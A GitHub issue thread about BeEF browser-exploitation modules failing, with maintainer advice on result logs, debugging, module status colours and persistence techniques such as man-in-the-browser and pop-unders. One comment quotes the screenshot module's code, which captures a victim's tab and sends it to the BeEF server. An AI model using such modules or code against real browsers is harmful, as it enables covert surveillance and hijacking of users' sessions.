### ISSUE TITLE
BEEF Modules not workin

### ISSUE THREAD

**Issue by JohnTet** [beefproject/beef#1194]
I have been playing with BEEF and noticed that many modules that confirms that should work (marked as green ) are actually not working. 

1) Is there any log file where we can see the result ?

2) About persistence none of the module works , though it shows in green, is the code stable ?

Ty

**Comment by bcoles** [comment]
Hi @JohnTet

Command module results are returned from the hooked browser to BeEF and stored in the database. The default database is `beef.db` in SQLite3 format. You can also view the results in the admin web interface.

Some modules contain additional client-side debugging information for testing purposes. You can enable client-side debugging by setting `beef.client_debug: true` in `config.yaml` then enabling the developer console on the hooked tab in your web browser.

Yes, the persistence modules are stable. I've briefly verified these modules are working in Firefox.

* Man-In-The-Browser is working in Firefox. Note that this module will cease working if the user browses to a different origin or manually enters a new URL in the address bar.
* Confirm Close Tab is working in Firefox.
* Create Foreground iFrame is working in Firefox. Note that this module will not work if the target site makes use of `X-Frame-Options` or frame-busting JavaScript.
* Create Pop Under is working in Firefox. Note that the user will be prompted to allow the popup due to popup blocking functionality (which is enabled by default in modern browsers), unless the hooked origin is permitted to launch popups.

Additionally, the following guide may be useful should you wish to learn how to submit useful bug reports: http://www.chiark.greenend.org.uk/~sgtatham/bugs.html

**Comment by JohnTet** [comment]
@bcoles  Thank you for replying.

I know that command results are returned from hooked browser and can be seen in web interface but it is not being shown, the result is empty.

Since I have checked the persistence modules thoroughly , there is NO tutorial that tells that persistence is happening.

Request : would you mind uploading video link of how persistence is happening for you , since I can upload video in which it is not happening and most of the module aren't working either. 

I am interested for solving it at my end thats why I asked about logs.

**Comment by bcoles** [comment]
The [Persistence](https://github.com/beefproject/beef/wiki/Persistence) page on the wiki contains some information about the persistence modules, although it is a little outdated.

Most of the persistence modules return a result indicating the module has been executed. It's unusual that you would receive no response from the hooked browser.

Which browsers are you hooking? Which version of BeEF are you using? Are you receiving any JavaScript errors? Are you receiving any Ruby errors in the BeEF console?

**Comment by bcoles** [comment]
Looks like there is an intermittent issue with the Create Pop Under module.

The other persistence modules are working as expected.

**Comment by JohnTet** [comment]
@bcoles  Thank you for replying.

I am getting this in both Mozilla and Chrome 

Chrome Version 47.0.2526.106 m

Mozilla Version 43.0.1

![capture](https://cloud.githubusercontent.com/assets/15995036/12285744/2d9a6872-b9df-11e5-961f-b160658ff4f7.PNG)


Since the last 3 are marked RED so I wont expect them to run (and they aren't running either) , About Man in the browser I used this link, but seems it is under construction . 

https://github.com/beefproject/beef/wiki/Module:-Man-In-The-Browser

what does this exactly do ? As requested Is there any chance of video demo for MITB ?

Thanks

**Comment by JohnTet** [comment]
While executing SCREENSHOT module , I get this on client side.

execute_commands - command failed to execute: Cannot read property 'captureVisibleTab' of undefined
hook.js:2703 function () {

    chrome.tabs.captureVisibleTab(null, function(img) {
        beef.net.send('/command/screenshot.js', 7, 'img: ' + img.toString());
    });
}

Have you tried that module ? i guess getting screenshot is no more possible after chrome has disabled this permission.

**Comment by bcoles** [comment]
Thanks for advising which browsers you're using.

Regarding the screenshot module, this module is in the `Chrome Extensions` category. The modules in this category work only when executed from within a Chrome extension. If you want to take a screenshot check out the [SpyderEye](https://github.com/beefproject/beef/blob/master/modules/browser/spyder_eye/config.yaml) module in the Browser category (yes, I admit it's not very intuitively named.)

Regarding the persistence modules marked red, these modules are in fact marked orange! You can learn more about the "traffic light" system used for command modules in the `Getting Started` tab in the BeEF web interface:

```
Each command module has a traffic light icon, which is used to indicate the following:

[GREEN]   The command module works against the target and should be invisible to the user
[ORANGE]  The command module works against the target, but may be visible to the user
[RED]     The command module is yet to be verified against this target
[GRAY]    The command module does not work against this target
```

There's also a brief summary in the [Interface](https://github.com/beefproject/beef/wiki/Interface) page on the wiki:

```
You will see bullets with different colors before each module. Internally, BeEF detects which browser you hooked and knows which modules are working on each browser :

    Green : It works on the browser selected. Go !
    Orange : It will work but the user may detect it. Notice that it can be legitimate for example for social engineering modules
    Red : it won't work on this browser. But you still can try !
```

Regarding Man-In-The-Browser, there are a [variety of videos available on YouTube](https://www.google.com.au/search?q=beef+man+in+the+browser&tbm=vid). You can learn more about the persistence modules, including Man-In-The-Browser, in [The Browser Hackers Handbook](https://archive.org/stream/TheBrowserHackersHandbook2014/The%20Browser%20Hackers%20Handbook%202014_djvu.txt) by Wade Alcorn, Christian Frichot , Michele Orru. In particular Chapter 3 - Retaining Control. There's also a companion website [browserhacker.com](http://browserhacker.com) which you might find useful.

Pay no attention to the Wordpress module in the Persistence category (unless you've XSS'd an origin running Wordpress!) - it's in the wrong category.

**Comment by JohnTet** [comment]
Thank you, and yes it is Orange :D

**Comment by hackerbbk** [comment]
Hello bcoles i use upload a file module is green but result page is null i updated beef but not working please help

**Comment by bcoles** [comment]
@hackerbbk please create a new issue rather than post on old issues.

Are you referring to the `phonegap_file_upload` module? That module only works if the PhoneGap API is available.

**Comment by hackerbbk** [comment]
what is phonegap api

**Comment by bcoles** [comment]
[PhoneGap API](https://phonegap.com/)

**Comment by hackerbbk** [comment]
how to use in javascript sory for my bad english

**Comment by bcoles** [comment]
This issue is closed. Please create a new issue.
